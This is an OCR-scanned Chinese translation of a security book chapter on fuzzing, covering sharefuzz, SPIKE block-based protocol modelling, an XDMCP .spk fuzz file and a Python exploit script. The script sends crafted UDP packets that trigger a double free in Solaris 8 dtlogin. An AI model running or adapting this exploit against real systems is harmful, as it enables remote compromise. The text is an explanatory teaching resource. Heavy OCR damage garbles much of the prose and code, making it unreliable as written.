标 进 程 来 监视 出 错 信 息 。 为 了 发 现 潜在 的 问题 ， 在 模糊 测试 过 程 中 ,你 ` 应 该 注意 所 有 的 异常 行 
为 。 时 至 今日 ，sharefuzz 仍 然 可 在 带 setuid 位 的 Solaris 程 序 中 发 现 漏洞 ， 我 们 把 这 些 漏洞 留 给 
读者 ， 希 望 你 们 能 把 它们 找 出 来 。 

Windows 下 也 有 一 个 与 sharefuzz 类 似 的 工具 ， 详 情 请 看 Holodeck ( www.sisecure.com/ 
holodeck/) 但 总 的 来 说 ， 模 糊 测 试 工具 (通称 故障 注入 ) 是 从 低层 访问 程序 的 ， 并 不 适用 于 安 
全 测试 ， 它 们 无 法 解决 大 多 数 bug 获 取 的 问题 ， 还 会 产生 许多 虚假 信息 . 


如 果 不 考虑 其 他 因素 ， 仅 从 严格 意义 上 说 ，sharefuzz 应 该 算是 “用 仪器 装备 的 故障 注入 器 ”， 
我 们 简单 看 一 下 sharefuzz 的 使 用 过 程 就 会 明白 。 尽 管 sharefuzz 的 功能 有 限 ， 但 通过 它 ， 我 们 可 以 
了 解 到 许多 高 级 模糊 测试 工具 〈 如 SPIKE，17.5 节 将 会 介绍 ) 的 优 缺 点 。 

17.1.1 静态 分 析 与 模糊 测试 

与 静态 分 析 不 同 ( 例 如 用 二 进 制 或 源码 分 析 )， 当 模糊 测试 工具 “找到 ”安全 漏洞 时 ， 它 提 
供给 用 户 的 是 一 组 用 于 发 现 这 个 漏洞 的 输入 数据 。 例 如 ， 当 进程 在 sharefuzz 的 测试 下 裔 溃 时 ， 
sharefuzz 会 向 我 们 提供 当时 的 环境 变量 ， 以 及 到 底 是 哪个 变量 〈 输 入 数据 ) SAT RR. FTE 
了 解 这 些 信息 后 ， 就 可 以 有 针对 性 地 进行 测试 ， 查 找到 底 是 哪里 引发 了 溢出 。 

在 静态 分 析 过 程 中 , 有 些 错 误 可 以 很 容易 发 现 , 而 通过 从 外 部 给 目标 程序 提交 输入 数据 来 发 
现 漏洞 要 困难 得 多 。 但 在 静态 分 析 过 程 中 , 如 果 想 跟踪 每 个 潜在 的 错误 以 证 实 它 是 否 会 真 的 发 生 ， 
效率 就 太 低 了 ， 或 者 说 很 容易 失控 。 

从 男 一 方面 来 说 ， 模 糊 测 试 工具 有 了 时 也 会 发 现 一 些 不 太 好 重 现 的 错误 。 比 如 说 ， 二 次 释放 
(Double Free) 错误 或 其 他 需要 两 个 关联 事件 连续 发 生 才能 出 现 的 错误 ， 这 些 都 是 比较 好 的 例子 ， 
这 也 是 很 多 模糊 测试 工具 发 送 伪 随 机 的 输入 数据 给 目标 系统 的 原因 , 因为 考虑 到 为 了 成 功 地 重 现 
用 户 的 会 话 , 需要 指定 伪 随 机 种 子 值 。 这 不 但 允许 模糊 测试 工具 通过 尝试 随机 值 来 探索 更 大 范围 
内 的 漏洞 ， 还 允许 在 将 探索 范围 缩小 到 某 个 特定 漏洞 时 完全 重 现 整个 测试 过 程 。 


17.1.2 可 扩 缩 的 模糊 测试 

静态 分 析 是 一 个 十 分 繁琐 的 过 程 。 因 为 通过 静态 分 析 并 不 能 确认 漏洞 是 否 存在 ， 为 了 验证 ， 
还 需要 跟踪 、 分 析 每 个 错误 ， 并 且 ， 这 样 的 过 程 不 适合 程序 的 其 他 实例 。 而 且 一 个 漏洞 是 否 可 以 
利用 ,会 受到 很 多 因素 的 影响 ， 包 括 程序 配置 、 编 译 选 项 、 机 器 架构 或 其 他 因素 。 此 外 ， 某 个 漏 
润 可 能 只 在 程序 的 某 个 版 本 里 存在 , 但 几乎 不 可 避免 的 是 , 可 利用 的 漏洞 将 引起 访问 违例 或 其 他 
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可 以 检测 到 的 内 存 恶 化 。 作 为 黑客 ， 我 们 对 不 可 利用 或 不 能 被 触发 的 漏洞 不 感 兴趣 。 因 此 ， 模 糊 
测试 工具 是 我 们 的 理想 选择 。 

说 模糊 测试 是 可 扩 缩 的 ， 主 要 是 因为 测试 SMTP 的 模糊 测试 方法 也 可 以 用 于 测试 其 他 种 类 的 
SMTP《〈 或 同一 服务 程序 的 不 同 配置 )。 比 如 说 ， 如 果 在 某 个 服务 程序 中 发 现 漏 洞 ， 并 且 可 以 触发 
这 些 漏 洞 ， 那么 模糊 测试 法 在 其 他 的 服务 程序 中 也 可 能 会 找到 类 似 的 错误 。 当 目标 系统 和 你 曾经 
测试 过 的 系统 类 似 时 ， 可 扩 缩 的 模糊 测试 法 将 价值 连城 。 

我 们 说 模糊 测试 可 扩 缩 还 有 另外 一 个 理由 , 因为 你 在 一 个 协议 里 寻找 的 漏洞 字符 串 ， 可 能 和 
在 其 他 协议 里 寻 技 的 漏洞 字符 串 类 似 。 例 如 ， 我 们 看 一 个 用 Python 写 的 遍历 目录 字符 串 的 脚本 。 

print "../"*5000 

这 个 字符 串 不 但 在 特殊 的 服务 器 〈 例 如 ，Web CGI 程序 ) 上 发 现 “ 可 拉 任 意 文件 ”的 漏洞 ， 
而 且 在 HelixServer〈 也 称 为 RealServer) 里 也 发 现 了 非常 有 趣 的 漏洞 。 这 个 漏洞 和 下 面 的 C 代 码 类 
似 ， 在 栈 缓冲 区 保存 每 个 目录 的 指针 。 

void example(){ 

char * ptrs[1024]; 

char * c; 

char **p; 

for (p-ptrs,c-instring; *cl-0; c++) 

{ 

if (*c=='/') ( 
*p-c; 
ptt; 

} 


} 
} 


函数 执行 后 ， 我 们 应 当 有 一 组 指向 各 级 目录 的 指针 ， 但 如 果 输 入 的 斜 枉 超过 1 024 个 ， 我 们 
就 可 以 用 指向 字符 串 的 指针 改写 保存 的 帧 指针 和 保存 的 返回 地 址 ， 这 将 产生 无 偏 移 漏洞 。 此 外 ， 
因为 不 需要 返回 地 址 ， 并 且 Linux、Windows 及 FreeBSD 平 台 上 都 可 以 运行 RealServer， 所 以 它 是 
少数 几 个 能 被 用 来 写 多 架构 shellcode 的 漏洞 之 一 。 

这 个 特殊 的 漏洞 位 于 RealServer 的 注册 代码 里 ,但 模糊 测试 工具 不 需要 知道 具体 的 注册 代码 ， 
它 只 需 关注 传递 给 程序 的 URL。 它 需要 知道 的 是 它 将 用 它 固 有 的 、 建 立 在 已 知 内 容 上 的 大 量 字 符 
串 集 高 效 替 换 它 看 到 的 每 一 个 字符 串 。 . 

需要 重点 注意 的 是 , 在 建立 模糊 测试 工具 过 程 中 , 我 们 会 用 大 部 分 时 间 测 试 模糊 测试 工具 能 
否 检测 已 知 漏洞 ， 然 后 再 尽 可 能 地 把 模糊 测试 工具 的 测试 过 程 抽象 化 。 这 样 一 来 ， 即 使 模糊 测试 
工具 没有 针对 未 知 漏洞 的 测试 数据 ， 也 可 能 会 发 现 它们 。 把 模糊 测试 工具 抽象 到 什么 程度 取决 于 
SASH. 因为 模糊 测试 工具 的 抽象 程度 不 同 ， 并 且 抽 象 程度 的 不 同 还 决定 了 模糊 测试 的 结果 不 
同 ， 所 以 每 个 模糊 测试 工具 都 有 自己 的 特性 。 


17.2 ”模糊 测试 法 的 缺点 
看 完 上 面 的 介绍 后 ， 你 可 能 会 认为 模糊 测试 法 是 有 史 以 来 最 好 的 东西 ， 但 它 不 是 万 能 的 ， 它 
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也 有 一 定 的 局 限 性 。 比 如 说 ， 模 糊 测 试 法 不 会 发 现 静态 分 析 时 发 现 的 每 一 个 漏洞 。 例 如 ， 假 设 程 
序 中 有 如 下 代码 段 : 


if (1Strcmp (userinputi,"<some static string»")) 


{ 
strcpy(buffer2,userinput2); 


} 

要 触发 这 个 漏洞 ， 必 须 把 userinput1 设 为 字符 串 〈 协 议 的 作者 知道 这 个 字符 串 ， 但 我 们 的 
模糊 测试 工具 不 知道 )， 而 userinput2 必 须 是 一 个 非常 长 的 字符 串 。 可 以 把 这 个 漏洞 分 成 两 部 分 
考虑 。 

(1) Userinput1 必 须 是 一 个 特定 的 字符 串 。 

(2) Userinput2 必 须 是 一 个 很 长 的 字符 串 。 

例如 ， 假 设 这 个 程序 是 SMTP 服 务 器 ， 它 把 HELO、EHLO 和 HELL 作 为 Hello 命 令 。 服 务 器 可 能 
在 接收 HELL 时 才 会 触发 某 个 漏 润 ， 而 这 是 未 公开 的 ， 且 仅 由 这 个 SMTP 使 用 。 

假设 模糊 测试 法 有 一 列 特殊 的 字符 串 ， 将 其 分 解 后 ,很 快 你 就 会 发 现 模糊 测试 所 花 时 间 按 指 
数 规律 增长 。 好 的 模糊 测试 法 将 尝试 一 列 字符 串 。 这 意味 着 对 每 个 变量 ， 模 糊 测 试 法 必须 尝 i 
个 字符 串 。 如 果 想 模糊 测试 WM 个 变量 ， 那 就 要 尝试 WeM 个 字符 串 ， 依 此 类 推 。( 对 模糊 测试 法 来 
说 ， 一 个 整数 正好 是 一 个 短 二 进 制 字符 串 。) 

对 模糊 测试 的 这 两 个 主要 缺点 , 一 般 是 通过 对 目标 程序 进行 静态 分 析 或 运行 时 的 二 进 制 分 析 
来 弥补 。 这 些 技术 可 以 增 大 代码 ?覆盖 面 ， 有 可 能 会 找到 隐藏 在 传统 模糊 测试 背后 的 漏洞 。 

在 使 用 多 种 模糊 测试 工具 之 后 ， 你 会 发 现 不 同 的 模糊 测试 工具 还 有 其 他 缺点 ， 可 能 是 因为 它 
们 有 不 同 的 基本 架构 ， 比 如 说 SPIKE， 是 用 C 编 写 的 ， 对 对 象 支持 不 好 ， 或 者 你 会 发 现 一 些 目标 
程序 不 适合 模糊 测试 ， 其 原因 可 能 是 目标 程序 的 响应 速度 太 慢 ， 也 有 可 能 是 目标 程序 在 收 到 异常 
的 输入 数据 时 会 月 泪 ， 而 在 所 有 的 裔 让 情形 中 找 出 可 利用 的 错误 是 比较 困难 的 〈 如 jiMail 和 
rpc. ttdbserverd): 或 者 你 发 现 用 于 通信 的 协议 非常 复杂 ， 需要 我 们 通过 网 络 跟踪 分 析 来 译 码 。 
但 所 幸 的 是 ， 这 些 情形 并 不 是 很 常见 。 


17.3 ”建立 任意 的 网 络 协议 模型 


暂时 撤 开 基 于 主机 的 模糊 测试 不 谈 , 因为 尽管 主机 模糊 测试 展示 了 模糊 测试 的 基本 特征 , 但 
对 我 们 来 说 ， 基 于 主机 〈 也 称 为 本 地 ) 的 漏洞 并 没有 太 大 的 价值 。 我 们 真正 关注 的 是 那些 远程 漏 
Jj. 这些 程 序 使 用 规定 的 网 络 协议 和 其 他 的 程序 通信 ， 使 用 的 协议 有 时 候 是 公开 的 ， 有 时 候 却 不 
是 。 

以 前 在 开发 模糊 测试 工具 时 有 很 大 的 局 限 , 比如 说 , 用 Perl 脚 本 和 其 他 编程 语言 来 模仿 协议 ， 
同时 用 某 个 方法 改变 它们 。 但 用 Perl 脚 本 的 话 ， 需 要 为 每 个 协议 准备 相应 的 模糊 测试 工具 ， 如 
SNMP 模糊 测试 工具 、HTTP 模 糊 测 试 工具 、SMTP 模 糊 测试 工具 等 ,无 穷 无 尽 。 而 且 ， 如 果 SMTP 
或 其 他 专 有 协议 用 HTTP 封 装 了 ， 该 怎么 办 呢 ? 


© 这 里 指 被 测试 的 代码 。 一 一 译 者 注 





362 第 17 章 模糊 测试 的 艺术 


解决 这 个 问题 的 根本 方法 是 用 如 下 方式 建立 网 络 协议 模型 , 然后 尽 可 能 在 其 他 网 络 协 议 里 包 
含 它 ， 并 确保 它 能 以 发 现 很 多 错误 的 方式 覆盖 目标 程序 的 代码 。 这 种 方式 通常 包括 用 长 字符 串 或 
不 同 的 字符 串 蔡 换 字符 串 、 用 大 整数 替换 整数 等 。 针 对 同一 目标 程序 ， 两 个 不 同 的 模糊 测试 工具 
几乎 不 可 能 找 出 同样 的 漏洞 。 即 使 一 个 模糊 测试 工具 可 以 覆盖 目标 程序 的 所 有 代码 ， 那 它 也 不 可 
能 覆盖 所 有 正确 的 顺序 或 正确 的 变量 。17.5 节 将 介绍 实现 这 些 目标 的 技术 ， 现 在 先 介绍 其 他 一 些 
也 很 有 用 的 模糊 测试 法 。 


17.4 其 他 可 能 的 模糊 测试 法 
用 模糊 测试 法 可 以 实现 很 多 目标 。 把 模糊 测试 和 其 他 代码 结合 起 来 使 用 ， 可 以 节省 时 间 。 


17.4.. 位 翻转 

假设 有 这 样 的 网 络 协议 : 

<length><ascii string><0x00> 

位 翻转 每 次 翻转 字符 串 中 的 一 位 ， 然 后 把 它 发 给 服务 器 。 因 此 ， 首 先 会 把 长 度 字段 改 成 非常 
大 的 值 (或 负数 )， 然 后 把 字符 串 改 成 陌生 字符 ， 再 把 0x00 改 成 非常 大 的 值 (或 负数 )。 这 些 改变 
中 的 任何 一 个 都 可 能 触发 月 省 或 可 利用 的 安全 漏洞 。 

位 翻转 突出 的 优点 是 编写 简单 ， 而 且 也 能 发 现 错误 。 当 然 ， 它 也 有 严重 的 局 限 。 


17.4.2 ”修改 开源 程序 

一 些 开 源 团体 投入 大 量 的 人 力 物力 实现 了 很 多 黑客 想 分 析 的 协议 ， 一 般 是 用 C 实 现 的 。 通 过 
修改 这 些 开源 代码 ， 发 送 长 字符 串 、 大 整数 或 客户 端 生 成 的 数据 ， 通 常 能 非常 快速 地 发 现 那 些 即 
使 从 头 开 始 写 的 、 优 秀 模糊 测试 工具 也 难以 发 现 的 漏洞 。 这 主要 是 因为 你 了 解 这 些 协 议 的 细节 ， 
可 以 直接 在 客户 端 里 使 用 ， 不 必 猜 测 某 个 字段 值 ， 它 们 会 自动 生成 。 此 外 ， 你 也 不 必 亲 自考 虑 怎 
样 绕 过 认证 或 协议 固有 的 checksum， 作 为 客户 端 ， 它 们 有 你 所 需要 的 认证 和 checksum 例 程 。 对 
于 用 反 北 向 工程 或 加 密 技 术 处 理 过 的 协议 来 说 ， 它 们 一 般 有 多 层 ， 这 时 候 对 你 来 说 ， 修 改 已 有 的 
实现 可 能 是 唯一 的 选择 。 

应 该 注意 的 是 ， 通 过 使 用 BELF 和 DLL 注入 法 ， 甚 至 都 不 用 修改 客户 端 。 你 通常 可 以 在 客户 端 
钩 住 某 些 函数 调用 ， 这 样 就 可 以 查看 和 操纵 客户 端 即将 发 送 的 数据 。 特 别 是 一 些 网 络 游戏 协议 
(Quake、Half-Lifg、Unreal 和 其 他 的 )， 它 们 为 了 阻止 欺诈 者 〈 外 挂 )， 通 常 采 用 分 层 保护 措施 ， 
这 时 ，ELF 和 DLL 注入 法 就 能 派 上 用 场 了 。 

17.4.3 ”带动 态 分 析 的 模糊 测试 

动态 分 析 〈 模 糊 目标 程序 时 对 其 进行 调试 ) 提供 了 很 多 有 用 的 数据 ， 你 可 以 用 它们 “指导 ” 
模糊 测试 。 例 如 ，RPC 程 序 通过 使 用 xdr_string、xdr_int 或 类 似 的 函数 调用 ， 从 你 提供 的 数据 
块 中 展开 变量 。 通 过 钩 住 这 些 例 程 ， 你 可 以 了 解 程序 期 望 从 你 的 数据 块 中 得 到 何 种 数据 。 另 外 ， 
你 可 以 在 程序 执行 时 跟踪 分 析 ， 了 解 它 执行 了 哪些 代码 ， 如 果 没 有 执行 某 个 代码 路 径 ， 你 可 能 也 
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会 发 现 其 中 的 原因 。 例 如 ， 程 序 里 可 能 有 一 个 比较 ， 但 每 次 比较 的 结果 基本 上 是 一 样 的 。 这 类 分 
析 还 不 太 成 熟 ， 但 很 多 人 在 为 实现 更 全 面 更 智能 的 下 一 代 模 糊 测 试 而 奋斗 。 
17.5 SPIKE 

到 目前 为 止 ， 你 应 该 对 模糊 测试 有 了 大 概 的 了 解 。 在 这 节 ， 我 们 将 剖析 一 个 模糊 测试 工具 ， 
并 通过 实例 来 验证 优秀 的 模糊 测试 工具 的 效率 ; 即使 是 碰 到 稍微 复杂 的 协议 , 模糊 测试 工具 也 可 
以 保证 其 效率 。 我 们 选择 的 模糊 测试 工具 称 为 SPIKE， 有 了 GNU 公 共 许 可 证 即 可 从 


http://www.immunitysec.com/resources-freesoftware.shtml 下 载 它 。 


17.5.1 什么 是 SPIKE 

SPIKE 使 用 了 模糊 测试 理论 中 独特 的 、 被 称 为 spike 的 数据 结构 。 对 于 熟悉 编译 理论 的 人 来 说 ， 
spike 为 记 住 数据 块 所 做 的 尝试 与 一 次 编译 即 通过 的 汇编 器 必须 做 的 事情 类 似 。 这 是 因为 SPIKE 本 
质 上 把 数据 块 组 合 在 一 起 ， 并 在 内 部 记录 其 长 度 。 

我 们 通过 一 些 简单 的 例子 演示 SPIKE 是 怎么 工作 的 。SPIKE 是 用 C 写 的 ， 所 以 下 面 的 例子 也 
用 C。 基 本 的 数据 段 描述 和 下 面 的 代码 类 似 。 数 据 缓冲 区 最 初 是 空 的 。 


Data: <> 
s_binary("00 01 02 03"); //push some binary data onto the spike 
Data: <00 01 02 03> 

s_block_size_big-endian_word("Blockname") ; 


Data: <00 01 02 03 00 00 00 00> 
我 们 在 缓冲 区 为 big-endian 字 保留 了 4B 的 空间 。 


S block start("Blockname"); 


Data: «00 01 02 03 00 00 00 00> 


EZE, IREASPIKEN 4 UMS TA: 


s_binary("05 06 07 08"); 


Data: «00 01 02 03 00 00 00 00 05 06 07 08» 


注意 上 面 块 的 结尾 ，4 作 为 块 大 小 也 被 插入 了 。 


s_block_end("Blockname") ; 


Data: «00 01 02 03 00 00 00 04 05 06 07 08> 

这 是 个 非常 简单 的 例子 ， 但 通过 这 个 例子 我 们 可 以 发 现 这 种 数据 结构 可 以 返回 并 填充 大 
小 , 这 对 SPIKE 模 糊 测 试 创作 包 来 说 很 关键 。 SPIKE 也 提供 例 程 来 “整理 ”( 从 内 存 获取 数据 结 
构 ， 为 了 网 络 传输 的 目的 而 把 它 格式 化 ) 网 络 协议 中 发 现 的 多 种 数据 结构 。 例 如 ， 字 符 串 通常 
被 表示 为 : 
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<length in big-endian word format> <string in ascii format> <null zero> 
<padding to next word boundary> 


同样 ， 整 数 也 能 被 表示 成 多 种 格式 和 多 种 endian， SPIKE 包 含 的 例 程 将 把 它们 转换 成 需要 的 
形式 。 


17.5.2 为 什么 用 SPIKE 数据 结构 模仿 网 络 协议 


用 SPIKE (或 类 似 于 SPIKE 的 API) 模仿 网 络 协议 有 很 多 好 处 。SPIKE API 以 线性 形式 表示 网 
络 协议 ， 因 此 可 以 把 网 络 协 议 描述 成 一 系列 未 知 的 二 进 制 数据 、 整 数 、 长 度 值 和 字符 串 。SPIKE 
可 以 自始至终 地 循环 这 个 协议 ,依次 模糊 测试 协议 中 的 整数 、 长 度 或 字符 操 。 在 模糊 测试 字符 串 
的 时 候 ， 可 以 封装 块 的 长 度 ， 并 改变 字符 串 来 反映 当前 块 的 长 度 ， 

相对 SPIKE 来 说 , 传统 的 做 法 是 预先 计算 大 小 , 或 采用 函数 的 方式 《实际 的 客户 端 也 这 么 做 ) 
写 这 个 协议 。 但 这 样 会 花 更 多 的 时 间 ， 并 且 也 不 允许 通过 模糊 测试 访问 每 个 字符 串 。 

1. SPIKE 包 括 多 种 程序 

为 了 支持 不 同 的 协议 ，SPIKE 包 括 多 个 示例 模糊 测试 工具 ， 其 中 最 值得 关注 的 是 MSRPC 和 
SunRPC。 除 此 之 外 ， 在 测试 普通 的 TCP 或 UDP 连接 时 ， 可 以 使 用 通用 的 模糊 测试 工具 。 如 果 想 
模糊 测试 一 些 新 的 协议 ， 可 以 参考 这 些 已 有 的 模糊 测试 工具 。 SPIKE 支 持 的 最 详尽 的 协议 当 属 
HTTP，SPIKE 的 HTTP 模糊 测试 工具 在 主流 Web 服 务 器 上 几乎 都 发 现 过 漏洞 。 如 果 你 想 模糊 测试 
Web 服 务 器 或 Web 服 务 器 的 组 件 ，SPIKE 无 疑 是 一 个 很 好 的 选择 。 

我 们 期 待 成 熟 的 SPIKE 〈 到 2008 年 8 月 ，SPIKE 就 7 周岁 了 ) 可 以 集成 运行 时 分 析 ， 并 加 上 对 
附加 数据 和 协议 的 支持 。 

2. SPIKE 示 例 : dtlogin 

SPIKE 比 较 难 上 手 ， 但 在 有 经 验 的 用 户 手 里 ， 甚 至 那些 从 来 没有 被 代码 审阅 者 发 现 的 漏洞 ， 
也 能 被 SPIKE 轻 松 找到 。 

例如 ， 大 多 数 UNIX 工 作 站 都 支持 的 XDMCPD 协 议 。 尽 管 在 很 多 情况 下 ， SPIKE 用 户 可 能 会 
试 着 手动 反 汇编 协议 ， 但 在 这 种 情况 下 ， 我 们 只 需 用 Ethereal (现在 改名 为 Wireshark) 剖析 这 个 
协议 。Ethereal 是 一 个 免费 的 网 络 协议 分 析 工 具 〔 在 第 15 章 讨论 过 )， 如 图 17-1 所 示 。 

SPIKE 文 件 如 下 : 


//xdmcp request.spk 

//compatable with SPIKE 2.6 or above 

//port 177 UDP 

//use these requests to crash it: 

//(dave@localhost src]$ ./generic send udp 192.168.1.104 177 
~/spikePRIVATE/xdmcp_request.spk 2 28 2 

//[daveGlocalhost src]$ -/generic send udp 192.168.1.104 177 
~/spikePRIVATE/xdmcp_request.spk 4 19 1 


//version 

s binary("00 01"); 
//Opcode (request-07) 
//3 is onebyte 
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//5 is two byte big endian 

8 int variable(0x0007,5); 

//message length 

//s_binary("00 17 "); 

$, binary. block size halfword bigendian("message"); 
s_block_start ("message"); 

//display number 

$8 int variable(0x0001,5); 

//connections 

$& binary("01"); 

//internet type 

s int, variable(0x0000,5); 

//addxess 192.168.1.100 

//connection 1 

s_binary("01"); 

//size in bytes 

//s_binary("00 04"); 
s_binary_block_size_halfword_bigendian("ip"); 
//ip 

s_block_start ("ip"); 

& binary("cO a8 01 64"); 

sS block end("ip"); 

//authentication name 

//s_binary("00 00"); 

S binary. block, size halfword bigendian("authname"); 
s block start("authname"); 

s string variable(""); 

s, block end("authname"); 


//authentication data 

Ss binary. block, size halfword bigendian("authdata"); 
s block start("authdata"); 

s string variable(""); 

s block end("authdata"); 

//s binary("00 00"); 

//authorization names (2) 

//3 is one byte 

s int variable(0x02,3); 


//size of string in big endian halfword order 
s binary block size halfword bigendian("MIT"); 
S block start("MIT"); 

s string variable("MIT-MAGIC-COOKIE-1"); 

s block end("MIT"); 


S binary. block size halfword bigendian("XC"); 
S block start("XC"); 
s string variable("XC-QUERY-SECURITY-1"); 
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S block end("XC"); 


//manufacture display id 

S binary block size halfword bigendian("DID"); 
S block start("DID"); 

s string variable(""); 

S block end("DID"); 


s block end("message"); 


«captures - Ethereal 





图 17-1 剖析 X-query 的 Ethereal 屏 幕 截图 
对 这 个 文件 ， 我 们 需要 重点 关注 的 是 它 基 本 上 直接 复制 了 Ethereal 剂 析 的 结果 。 我 们 保留 了 
协议 的 结构 ， 但 为 了 使 用 方便 ， 把 它 展 平 了 。 当 SPIKE 运 行 这 个 文件 的 时 候 ， 它 将 渐进 地 生成 改 
进 后 的 xdmcp 请 求 包 ， 并 把 它们 发 送 给 目标 系统 。 在 某 些 Solaris 系 统 上 ， 服 务 器 程序 在 我 们 的 控 
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制 下 将 两 次 free() 同一 缓冲 区 ， 这 是 典型 的 二 次 释放 错误 ， 可 以 利用 它 获得 远程 服务 器 的 控制 。 
因为 许多 UNIX( 如 AIX、Tru64、Irix 和 其 他 包括 CDE 的 UNIX) 都 包括 atlogin (有 问题 的 程序 )， 
所 以 有 理由 相信 这 个 漏洞 的 攻击 代码 将 通 吃 这 些 平台 。 花 一 小 时 得 到 这 样 的 结果 ， 还 不 算 太 差 。 

下 面 的 .spk 是 一 个 SPIKE 文 件 ， 它 比 前 面 的 例子 要 复杂 一 些 ， 但 总 的 来 说 ， 不 算 难 理解 ， 因 
为 这 个 协议 大 家 多 少 都 了 解 一 点 。 像 你 看 到 的 那样 ， 多 个 块 彼此 交织 在 一 起 ，SPIKE 将 根据 需要 
来 更 新 块 大 小 (长 度 )。 发 现 这 个 漏洞 不 需要 读 源码 ， 更 不 需要 深入 分 析 协 议 ， 它 实际 上 是 由 
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return str 


#returns a binary version of the string 
def binstring(instring,size=1): 
result="" ` 
#erase all whitespace 
tmp-instring.replace(" ","") 
tmp=tmp.replace("\n","") 
tmp=tmp.replace("\t","") 


if len(tmp) % 2 != 0: 
print "tried to binstring something of illegal length" 
return "" 

while tmp!="": 


two-tmp[:2] 

#account for Ox and \x stuff 

if two!="0x" and two!="\\x": 
result+=chr (int (two,16)) 

tmp-tmp[2:] 


return result*size 


#for translation from .spk 
def s_binary(instring): 
return binstring(instring) 


#overwrites a string in place...hard to do in python 
def stroverwrite(instring,overwritestring,offset): 
head-instring[:offset] 
#print head 
tail-instring[offset-len(overwritestring):] 
#print tail 
result=head+overwritestring+tail 
return result 


#let's not mess up our tty 
def prettyprint (instring): 
tmp-"" 
for ch in instring: 
if ch.isalpha(): 


tmp+=ch 

else: 
value-"£x" 名 ord(ch) 
tmp+="["+value+"]}" 


return tmp 


#this packet contains a lot of data 
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packeti-"" 

packet1l+=binstring("0x00 0x01 0x00 0x07 0x00 Oxaa 0x00 0x01 0x01 0x00") 
packet1+=binstring("0x00 0x01 0x00 0x04 OxcO Oxa8 0x01 0x64 0x00 0x00 
0x00 0x00 0x02 0x00") 

packeti+=binstring ("0x80") 


#not freed? 

packeti+=binstring("Oxfe Oxfe Oxfe Oxfe ") 

#this is the string that gets freed right here 
packetl+=binstring("Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxfe Oxf1 
Oxf2 Oxf3") 





packeti+=binstring("Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa 
Oxaa Oxff") 


#here is what is actually passed into free() next time 
#i0 

packet1+=sun_order (Oxfefbb5£0)} 
packeti+=binstring("Oxcf Oxdf Oxef Oxcf ") 


#second i0 if we pass first iO 
packet1+=sun_order (0x51fc8) 


packetl+=binstring("Oxff Oxaa Oxaa Oxaa") 


#third and last 
packet1+=sun_order (0xffbed010) 


packetl«-binstring("0xaa Oxaa Oxaa Oxaa Oxaa Oxaa Oxaa") 
packetl+=binstring("Oxff Ox5f Oxff Oxff Oxff Ox9f Oxff Oxff Oxff Oxff 
Oxff Oxff Oxff Oxff") 

packeti+=binstring("Oxff Ox3f Oxff Oxff Oxff Oxff Oxff Oxff Oxff Oxff 
Oxff Oxff Oxff Oxff") 

packetl«-binstring("Ox£ff Oxff Oxff Ox3f Oxff Oxff Oxff Ox2f Oxff Oxff 
Oxlf Oxff Oxff Oxff") 

packetl«-binstring("Oxff Oxfa Oxff Oxfc Oxff Oxfb Oxff Oxff Oxfc Oxff 
Oxff Oxff Oxfd Oxff") 

packetl«-binstring("Oxf1 Oxff Oxf2 Oxff Oxf3 Oxff Oxf4 Oxff Oxf5 Oxff 
Oxf6 Oxff Oxf7 Oxff") 

packeti«-binstring("Oxff Oxff Oxff ") 

#end of string 

packetl«-binstring("0x00 0x13 0x58 0x43 Ox2d 0x51 0x55 0x45 0x52 0x59 0x2d")} 


packetl+=binstring("0x53 0x45 0x43 0x55 0x52 0x49 0x54 0x59 Ox2d 0x31 
0x00 OxOO ") 





#this packet causes the memory overwrite 
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packet2="" 
packet2«-binstring("Ox00 0x01 0x00 0x07 0x00 
packet2+=binstring("0x01 0x00 0x00 0x01 0x00 
0x00 0x00 0x00 0x00") l 
packet2+=binstring("0x06 0x00 0x12 0x4d 0x49 
0x49 0x43 0x2d 0x43") 
packet2+=binstring("0x4f Ox4f Ox4b 0x49 0x45 
0x43 Ox2d 0x51 0x55") 
packet2+=binstring("0x45 0x52 0x59 Ox2d 0x53 
0x54 0x59 Ox2d 0x31") 
packet2*-binstring("Ox00 0x00") 


class xdmcpdexploit: 
def | init (self): 
self.port-177 
self.host-"" 


return 
setPort(self,port): 
self.port-port 


def 


return 


def setHost(self,host): 
self.host-host 


return 


def run(self): 


Ox3c 
0x04 


0x00 0x01") 
OxcO Oxa8 0x01 0x64 


0x54 0x2d Ox4d 0x41 0x47 
Ox2d 0x31 0x00 0x13 0x58 


0x45 0x43 0x55 0x52 0x49 


#first make socket connection to target 177 


S - Socket.socket(socket.AF INET, 
S.connect((self.host, self.port)} 
#sploitstring=self.makesploit () 
print "[*] Sending first packet..." 
S.send(packet1) 

time.sleep(1) 


print "[*] Receiving first response." 


result = s.recv(1000) 
print "result="+prettyprint (result) 
if 


socket . SOCK_DGRAM) 


prettyprint (result)=="[0][1][01](9] [0] [1c] [0] [16]No[20]valid{20]authoriza 


tion[0] [0] {0][0]": 


print "That was expected. Don't panic. We're not valid ever. 


s.close() 


S = Socket.socket(socket.AF INET, 
s.connect((self.host, self.port)) 
print "[*] Sending second packet" 
S.send(packet2) 
#time.sleep(1) 


socket . SOCK_DGRAM) 


>t 
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#result = s.recv(1000) 
s.close() 

#success 

print "[*] Done." 


#this stuff happens. 
if | name  -- ' main ': 





print "Running xdmcpd exploit v 0.1" 
print "Works on dtlogin Solaris 8" 
app = xdmcpdexploit() 
if len(sys.argv) « 2: 
print "Usage: xdmcpx.py target [port]" 
Sys.exit() 
app.setHost(sys.argv[1]) 
if len(svs.argv) -- 3: 
app.setPort(int(sys.argv[2])) 


app.run() 


17.6 ”其 他 的 模糊 测试 工具 

市 面 上 很 快 就 会 出 现 新 的 模糊 测试 工具 。Hailstorm 和 eEye 的 CHAM 是 商业 模糊 测试 工具 。 
如 果 你 想 进一步 了 解 模糊 测试 工具 ，Greg Hoglund 在 Blackhat 上 演示 的 幻灯 片 值得 一 读 。 现 在 有 
很 多 人 开始 模仿 SPIKE 的 数据 结构 ， 编 写 属于 自己 的 模糊 测试 工具 。 如 果 你 也 有 此 打算 ， 建 议 使 
用 Python〈 如 果 重 写 SPIKE， 训 无 疑问 会 首选 Python)。 此 外 ， 你 可 以 在 BlackHat 文 集中 找到 很 多 
有 关 SPIKE 的 讨论 。 


17.7 小结 


一 章 的 篇 幅 很 难 展现 模糊 测试 的 魔力 ,这 一 点 毋庸 置疑 。 但 我 们 希望 你 能 熟悉 更 多 的 模糊 测 
